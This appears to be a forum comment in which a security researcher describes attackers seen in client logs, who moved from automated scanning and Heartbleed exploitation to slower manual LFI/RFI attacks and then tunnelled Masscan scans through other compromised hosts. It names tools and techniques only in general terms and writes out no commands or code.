pry0cc-
I have watched these operators pretty closely; the article itself is a living article and will be added to and edited, with new editions released.
They seem to be playing a smart game: the server scans perpetually for vulnerabilities and seems to change up to attack newer vulns much quicker…these are largely automated attacks…for instance, they still scan for Heartbleed and exploit those machines.
However, I have collected quite a few logs from clients that I cannot utilize due to NDA…what I can tell you is that there are human actors manually exploited machines as well.
Logs willsee the machine attack, and this will be normally automated attacks: bruteforce, now that someone released that automated Metasploit release, I bet it did or does something similar: san, detct, fire off some exploits, move on.
But then my clients logs showed something else: more acute attacks against these hosts sometime later on…so we are talking attacks with a bit more finesse, like LFI/RFI, Curl orother manual bash/terminal commands utilized for offensive action, but with much more thought and precision, and much slower.
When these attacks succeded, the attacker would immediately wget or git Masscan onto the machine, and then tunnel those scans through other hosts.
When I checked public abuse reports for the IP of the machines serving as the tunneling hosts, I almost always found earlier attacks against it or the others and reports of succesful exploitation.
Most of the attacks that appeared to be human targeted high value targets such as .gov sites (which are excellent for carding) where they didn’t want to risk being loud.
What I can also tell you was that I tracked one of these actors a=for about the same length of time as I have watched this hist: they never changed their user-agent or OS and they had a solid work ethic…they were grinding 6 to sometimes 12 hours a day and they had a solid grasp of Linux/Unix/Windows administration (most of their work occured from common terminal utilities rather than using some garbage Kitploit toy to target RPC, HTTP methods/requests, interrogate Windows shares, etc…
I will tell you what everyone, this is why I will always release my research here first (and I have some projects I am excited to release llater this year)…no where else can I conversate with folks like this.
maderas